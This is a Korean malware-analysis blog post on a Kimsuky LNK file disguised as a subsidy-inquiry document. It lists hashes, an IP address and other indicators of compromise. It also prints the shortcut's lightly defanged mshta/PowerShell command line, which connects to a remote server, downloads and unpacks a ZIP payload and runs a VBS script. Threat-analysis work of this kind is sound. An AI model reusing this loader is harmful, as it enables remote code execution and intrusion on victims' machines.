lazarusholic

Everyday is lazarus.dayβ

김수키(Kimsuky) 보조금신청 관련문의건 으로 위장 하는 악성코드(2024.9.23)

2024-09-26, Sakai
http://wezard4u.tistory.com/429286
#Kimsuky #LNK

Contents

오늘은 북한 해킹 단체 김수키(Kimsuky)에서 만든 보조금신청 관련문의건 으로 위장하는 악성코드(2024.9.23)에 대해 알아보겠습니다.
일단 제목이 보조금신청 관련문의건 인 것으로 보아서 보조금을 관련 전기차 보조금 등 각종 보조금 관련해서 해킹하기 위해서 준비한 것처럼 생각됩니다. 먼저 해쉬값은 다음과 같습니다.
파일명:보조금신청 관련문의건.docx.lnk
사이즈:2.36 KB
MD5:1f29ccc30a6d053fcbc5210d921ac721
SHA-1:35b7c9abc46750e9c1f672086427326d4d18669b
SHA-256:24a0124e2e38407f2062dc2bfb0bd474413a10d80ef8e1913ecfa699d962229f
해당 악성코드를 열어보면 다음과 같이 되어져 있는 것을 확인을 할수가 있음
StringData
{
namestring: not present
relativepath: ..\..\..\Windows\Sys(t)em32\mshta(.)exe
workingdir: C:\Windows\Sy(s)tem32
commandlinearguments: javasc(r)ipt:p="se6(4)String($z);$";s="Str(e)am";
w="a=new Act"+"iveXObject('WScr"(+)"ipt.Shell');a.Run(c,(0),0);close();"
;a="System(.)IO."+s;t=" -Path $t -";n="New-(O)bject System.";d="c:\\prog
ra(m)data";c="power"(+)"shell -ep bypass -c $r='64(.)49(.)14(.)181';$p='8
014';$r="+n(+)"IO."+s+"Reader(("+n+"Net(.)Sockets.TcpClient($r, $p)).Get"
(+)s(+)"());$z=$r.ReadLine();$b=[Con"(+)"vert]::FromBa"+p+"t='"+d+"\\t.zip
';Set-Content"+t+"V $b -Encoding By(t)e;Expand-Archive"(+)t+"D "(+)d+";del
$t;$v='"+d+"\\s(.)vbs';&$v;sc "+d+"\\nt9(1)48 81";eval(w);
iconlocation: (.)docx
}
local_base_path: C:\Windows\System32\mshta.exe
악성코드 분석
해당 악성코드는 악성 스크립트를 실행하기 위해 Windows의 기본 시스템 파일인 mshta.exe를 사용을 하는것이 특징이며
간단하게 분석을 하면 다음과 같습니다.
1.commandlinearguments 에 지정된 명령 줄 인수는 JavaScript 코드로 PowerShell 명령을 실행하도록 구성되어 있음
변수를 설정하고 ActiveXObject를 사용해 WScript.Shell을 생성
WScript.Shell은 명령을 실행할 수 있는 객체
해당 $r 은 원격 서버의 IP 주소(64(.)49(.)14(.)181)를 $p는 포트 번호(8014)를 나타내며 악성 코드는 해당 원격 서버에 연결을 시도
PowerShell을 이용하여 원격 서버에 TCP 연결을 시도하며 연결을 통해 추가 데이터인 t.zip 가져옵니다.
그리고 서버로부터 읽어온 데이터를 $z 변수에 저장
원격 서버로부터 받은 Base64 인코딩된 …

IoC

24a0124e2e38407f2062dc2bfb0bd474413a10d80ef8e1913ecfa699d962229f
35b7c9abc46750e9c1f672086427326d4d18669b
64.49.14.181